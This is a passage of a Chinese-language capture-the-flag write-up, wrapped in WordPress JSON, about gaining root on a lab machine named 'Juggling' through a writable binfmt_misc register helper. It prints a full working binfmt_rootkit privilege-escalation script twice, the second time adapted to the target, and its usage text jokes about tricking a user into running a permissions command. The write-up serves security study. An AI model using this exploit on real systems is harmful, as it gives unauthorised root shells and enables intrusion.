(remote) rehan@juggling:\/home\/rehan$ ls -la \/usr\/local\/bin\/register\n-rwxr-x--- 1 root rehan 16808 Jul 10  2022 \/usr\/local\/bin\/register\n(remote) rehan@juggling:\/home\/rehan$ file \/usr\/local\/bin\/register\n\/usr\/local\/bin\/register: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=77b1bc1a5d6700dad83368f9586364ab0a245447, for GNU\/Linux 3.2.0, not stripped<\/code><\/pre>\n
\u7a0b\u5e8f\u5206\u6790<\/h4>\n
\u4e0b\u8f7d\u5230\u672c\u5730\u8fdb\u884c\u7a0b\u5e8f\u5206\u6790\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/juggling]\n\u2514\u2500$ pwn checksec register                     \n[*] '\/home\/kali\/temp\/juggling\/register'\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      PIE enabled<\/code><\/pre>\n
\u53cd\u7f16\u8bd1\u770b\u4e00\u4e0b\uff1a<\/p>\n
int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  size_t v3; \/\/ rax\n  char buf; \/\/ [rsp+0h] [rbp-210h]\n  int fd; \/\/ [rsp+20Ch] [rbp-4h]\n\n  read(0, &buf, 0x200uLL);\n  fd = open("\/proc\/sys\/fs\/binfmt_misc\/register", 1);\n  v3 = strlen(&buf);\n  write(fd, &buf, v3);\n  close(fd);\n  return 0;\n}<\/code><\/pre>\n
\u7fa4\u91cc\u95ee\u95ee\uff0c\u7136\u540e\u5c1d\u8bd5\u4e0a\u4f20linpeas.sh<\/code>\u4ee5\u53capspy64<\/code>\uff0c\u6ca1\u53d1\u73b0\u5565\u6709\u7528\u7684\u3002<\/p>\n
binfmt_misc rootkit\u5229\u7528<\/h4>\n
\u6ce8\u610f\u5230\/proc\/sys\/fs\/binfmt_misc\/register<\/code>\uff0c\u4e0a\u7f51\u67e5\u4e86\u4e00\u4e0b\uff1ahttps:\/\/github.com\/toffan\/binfmt_misc\/blob\/master\/binfmt_rootkit<\/a><\/p>\n
\n
Linux \u5185\u6838\u6709\u4e00\u4e2a\u540d\u4e3a Miscellaneous Binary Format\uff08binfmt_misc<\/code>\uff09\u7684\u673a\u5236\uff0c\u53ef\u4ee5\u901a\u8fc7\u8981\u6253\u5f00\u6587\u4ef6\u7684\u7279\u6027\u6765\u9009\u62e9\u5230\u5e95\u4f7f\u7528\u54ea\u4e2a\u7a0b\u5e8f\u6765\u6253\u5f00\u3002\u8fd9\u79cd\u673a\u5236\u53ef\u4ee5\u901a\u8fc7\u6587\u4ef6\u7684\u6269\u5c55\u540d\u548c\u6587\u4ef6\u5f00\u59cb\u4f4d\u7f6e\u7684\u7279\u6b8a\u7684\u5b57\u8282\uff08Magic Byte\uff09\u6765\u5224\u65ad\u5e94\u8be5\u5982\u4f55\u6253\u5f00\u6587\u4ef6<\/p>\n<\/blockquote>\n
\u53ef\u4ee5\u53c2\u8003\uff1ahttps:\/\/pencer.io\/ctf\/ctf-htb-retired\/#binfmt-exploit<\/a><\/p>\n
https:\/\/cloud.tencent.com\/developer\/article\/2341174<\/a><\/p>\n
https:\/\/0xdf.gitlab.io\/2022\/08\/13\/htb-retired.html#shell-as-root<\/a><\/p>\n
https:\/\/htb.haydenhousen.com\/machines\/retired<\/a><\/p>\n
#!\/bin\/bash\n\nreadonly searchsuid="\/bin\/"\nreadonly mountpoint="\/proc\/sys\/fs\/binfmt_misc"\nreadonly exe="$0"\n\nwarn()\n{\n    1>&2 echo $@\n}\n\ndie()\n{\n    warn $@\n    exit -1\n}\n\nusage()\n{\n    cat 1>&2 <<EOF\nUsage: $exe\n    Gives you a root shell if \/proc\/sys\/fs\/binfmt_misc\/register is writeable,\n    note that it must be enforced by any other mean before your try this, for\n    example by typing something like "sudo chmod +6 \/*\/*\/f*\/*\/*r" while Dave is\n    thinking that you are fixing his problem.\nEOF\n    exit 1\n}\n\nfunction not_writeable()\n{\n    test ! -w "$mountpoint\/register"\n}\n\nfunction pick_suid()\n{\n    find "$1" -perm -4000 -executable \\\n        | tail -n 1\n}\n\nfunction read_magic()\n{\n    [[ -e "$1" ]] && \\\n    [[ "$2" =~ [[:digit:]]+ ]] && \\\n    dd if="$1" bs=1 count="$2" status=none \\\n        | sed -e 's-\\x00-\\\\x00-g'\n}\n\n[[ -n "$1" ]] && usage\n\nnot_writeable && die "Error: $mountpoint\/register is not writeable"\n\ntarget="$(pick_suid "$searchsuid")"\ntest -e "$target" || die "Error: Unable to find a suid binary in $searchsuid"\n\nbinfmt_magic="$(read_magic "$target" "126")"\ntest -z "$binfmt_magic" && die "Error: Unable to retrieve a magic for $target"\n\nfmtname="$(mktemp -u XXXX)"\nfmtinterpr="$(mktemp)"\n\ngcc -o "$fmtinterpr" -xc - <<- __EOF__\n    #include <stdlib.h>\n    #include <unistd.h>\n    #include <stdio.h>\n    #include <pwd.h>\n\n    int main(int argc, char *argv[])\n    {\n        \/\/ remove our temporary file\n        unlink("$fmtinterpr");\n\n        \/\/ remove the unused binary format\n        FILE* fmt = fopen("$mountpoint\/$fmtname", "w");\n        fprintf(fmt, "-1\\\\n");\n        fclose(fmt);\n\n        \/\/ MOTD\n        setuid(0);\n        uid_t uid = getuid();\n        uid_t euid = geteuid();\n        struct passwd *pw = getpwuid(uid);\n        struct passwd *epw = getpwuid(euid);\n        fprintf(stderr, "uid=%u(%s) euid=%u(%s)\\\\n",\n            uid,\n            pw->pw_name,\n            euid,\n            epw->pw_name);\n\n        \/\/ welcome home\n        char* sh[] = {"\/bin\/sh", (char*) 0};\n        execvp(sh[0], sh);\n        return 1;\n    }\n__EOF__\n\nchmod a+x "$fmtinterpr"\n\nbinfmt_line="_${fmtname}_M__${binfmt_magic}__${fmtinterpr}_OC"\necho "$binfmt_line" > "$mountpoint"\/register\n\nexec "$target"<\/code><\/pre>\n
\u8bd5\u8bd5\uff01<\/p>\n
(remote) rehan@juggling:\/tmp$ vim binfmt_rootkit\n(remote) rehan@juggling:\/tmp$ chmod +x binfmt_rootkit \n(remote) rehan@juggling:\/tmp$ .\/binfmt_rootkit \nError: \/proc\/sys\/fs\/binfmt_misc\/register is not writeable<\/code><\/pre>\n
\u8fd8\u9700\u8981\u4fee\u6539\uff0c\u5220\u9664\u68c0\u67e5\u884c\uff1a<\/p>\n
function not_writeable()\n{\n    test ! -w "$mountpoint\/register"\n}<\/code><\/pre>\n
not_writeable && die "Error: $mountpoint\/register is not writeable"<\/code><\/pre>\n
\u518d\u6b21\u8fd0\u884c\uff1a<\/p>\n
(remote) rehan@juggling:\/tmp$ .\/binfmt_rootkit \nError: \/proc\/sys\/fs\/binfmt_misc\/register is not writeable<\/code><\/pre>\n
\u54e6\u5bf9\u4e86\uff0c\u8fd8\u8981\u4fee\u6539\u4e00\u4e0b\u8def\u5f84\uff1a<\/p>\n
echo "$binfmt_line" | \/usr\/local\/bin\/register<\/code><\/pre>\n
\u6210\u54c1\uff1a<\/p>\n
#!\/bin\/bash\n\nreadonly searchsuid="\/bin\/"\nreadonly mountpoint="\/proc\/sys\/fs\/binfmt_misc"\nreadonly exe="$0"\n\nwarn()\n{\n    1>&2 echo $@\n}\n\ndie()\n{\n    warn $@\n    exit -1\n}\n\nusage()\n{\n    cat 1>&2 <<EOF\nUsage: $exe\n    Gives you a root shell if \/proc\/sys\/fs\/binfmt_misc\/register is writeable,\n    note that it must be enforced by any other mean before your try this, for\n    example by typing something like "sudo chmod +6 \/*\/*\/f*\/*\/*r" while Dave is\n    thinking that you are fixing his problem.\nEOF\n    exit 1\n}\n\nfunction pick_suid()\n{\n    find "$1" -perm -4000 -executable \\\n        | tail -n 1\n}\n\nfunction read_magic()\n{\n    [[ -e "$1" ]] && \\\n    [[ "$2" =~ [[:digit:]]+ ]] && \\\n    dd if="$1" bs=1 count="$2" status=none \\\n        | sed -e 's-\\x00-\\\\x00-g'\n}\n\n[[ -n "$1" ]] && usage\n\ntarget="$(pick_suid "$searchsuid")"\ntest -e "$target" || die "Error: Unable to find a suid binary in $searchsuid"\n\nbinfmt_magic="$(read_magic "$target" "126")"\ntest -z "$binfmt_magic" && die "Error: Unable to retrieve a magic for $target"\n\nfmtname="$(mktemp -u XXXX)"\nfmtinterpr="$(mktemp)"\n\ngcc -o "$fmtinterpr" -xc - <<- __EOF__\n    #include <stdlib.h>\n    #include <unistd.h>\n    #include <stdio.h>\n    #include <pwd.h>\n\n    int main(int argc, char *argv[])\n    {\n        \/\/ remove our temporary file\n        unlink("$fmtinterpr");\n\n        \/\/ remove the unused binary format\n        FILE* fmt = fopen("$mountpoint\/$fmtname", "w");\n        fprintf(fmt, "-1\\\\n");\n        fclose(fmt);\n\n        \/\/ MOTD\n        setuid(0);\n        uid_t uid = getuid();\n        uid_t euid = geteuid();\n        struct passwd *pw = getpwuid(uid);\n        struct passwd *epw = getpwuid(euid);\n        fprintf(stderr, "uid=%u(%s) euid=%u(%s)\\\\n",\n            uid,\n            pw->pw_name,\n            euid,\n            epw->pw_name);\n\n        \/\/ welcome home\n        char* sh[] = {"\/bin\/sh", (char*) 0};\n        execvp(sh[0], sh);\n        return 1;\n    }\n__EOF__\n\nchmod a+x "$fmtinterpr"\n\nbinfmt_line="_${fmtname}_M__${binfmt_magic}__${fmtinterpr}_OC"\necho "$binfmt_line" | \/usr\/local\/bin\/register\n\nexec "$target"<\/code><\/pre>\n
\u62ff\u4e0broot\uff01\uff01\uff01<\/p>\n
\"image-20240712142657712\"<\/div><\/p>\n
\u53c2\u8003<\/h2>\n
https:\/\/www.bilibili.com\/video\/BV17z421C7zW\/<\/a><\/p>\n
https:\/\/blog.csdn.net\/xdeclearn\/article\/details\/125968836<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Juggling \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/juggling] \u2514\u2500$ […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,19,18],"tags":[],"class_list":["post-756","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-pwn","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/756","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=756"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/756\/revisions"}],"predecessor-version":[{"id":757,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/756\/revisions\/757"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=756"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=756"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=756"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}